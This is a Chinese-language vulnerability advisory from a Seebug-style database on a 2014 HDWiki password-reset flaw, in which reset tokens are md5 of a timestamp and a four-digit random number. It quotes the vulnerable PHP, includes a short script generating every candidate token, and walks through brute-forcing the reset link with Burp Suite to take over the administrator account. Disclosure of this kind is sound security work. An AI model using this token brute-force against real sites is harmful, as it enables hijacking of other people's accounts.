Hdwiki 设计缺陷知邮箱可改密码（包括管理员）

基本字段

漏洞编号：: SSV-94575

披露/发现时间：: 2014-04-06

提交时间：: 2014-04-06

漏洞等级：

漏洞类别：: 其他类型

影响组件：: HDWiki

漏洞作者：: ′雨。

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2014-055786

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述：设计缺陷。 ### 详细说明：在control/user.php中 ``` function dogetpass(){ if(isset($this->get[2])){ $uid = is_numeric($this->get[2]) ? $this->get[2] : 0; $encryptstring=$this->get[3]; $idstring=$_ENV['user']->get_idstring_by_uid($uid,$this->time); if(!empty($encryptstring) && !empty($idstring) && ($idstring==$encryptstring)){ ``` 省略一点。 ``` }else{ $timetemp=date("Y-m-d H:i:s",$this->time); $verification= rand(1000,9999); $encryptstring=md5($this->time.$verification); $reseturl=WIKI_URL."/index.php?user-getpass-".$user['uid'].'-'.$encryptstring; $_ENV['user']->update_getpass($user['uid'],$encryptstring); $mail_subject = $this->setting['site_name'].$this->view->lang['getPass']; $mail_message = $this->view->lang['resetPassMs1'].$user['username'].$this->view->lang['resetPassMs2'].$timetemp.$this->view->lang['resetPassMs3']."<a href='".$reseturl."' target='_blank'>".$reseturl."</a>".$this->view->lang['resetPassMs4'].$this->setting['site_name'].$this->view->lang['resetPassMs5'].$this->setting['site_name'].$this->view->lang['resetPassMs6']; $this->load('mail'); $_ENV['mail']->add(array(), array($email), $mail_subject, $mail_message, '', 1, 0); $this->message($this->view->lang['emailSucess'],'index.php?user-login',0); ``` 看这里需要改密码的话就是验证encryptstring 而encryptstring的验证很弱。。 $encryptstring=md5($this->time.$verification); 这里就是对时间戳和一个随机的1000-10000 进行md5一次。这里我们可以来直接进行爆破。由于管理员和用户都是在一个表里面的。所以也可以改管理的密码。 ### 漏洞证明：在点击找回密码的时候记住一下时间戳 [<img src="https://images.seebug.org/upload/201404/062131128523ec147d60fe6d58dabd63b1e3c38d.jpg" alt="h3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/062131128523ec147d60fe6d58dabd63b1e3c38d.jpg) 然后写个脚本。因为我之前测试的时候时间戳不是这样的我用的之前测试的时候的时间戳截图。 ``` <?php for ($a=1000;$a<10001;$a++){ $b=md5("1396789952$a"); echo "\r\n"; echo $b;} ?> ``` 然后导出来, 然后载入burpsuite进行爆破。 index.php?user-getpass-".$user['uid'].'-'.$encryptstring 路径是为这样的一般我们就是用来修改管理员的密码、而管理的uid都是1 这个就不用管了。 [<img src="https://images.seebug.org/upload/201404/06213254124e9e0d9fee2ac4f79712eeaf2a638f.jpg" alt="h4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/06213254124e9e0d9fee2ac4f79712eeaf2a638f.jpg) 观察length 即可知道正确不。可以看到我这个爆破到3768的时候成功。然后直接访问。 [<img src="https://images.seebug.org/upload/201404/0621345138879f60971e55891a21bbf0e8f899bd.jpg" alt="h5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/0621345138879f60971e55891a21bbf0e8f899bd.jpg) 即可直接修改管理的密码。

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2014-055786

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

Hdwiki 设计缺陷知邮箱可改密码（包括管理员）

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Hdwiki 设计缺陷 知邮箱可改密码（包括管理员）

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

Hdwiki 设计缺陷知邮箱可改密码（包括管理员）

评论前需绑定手机现在绑定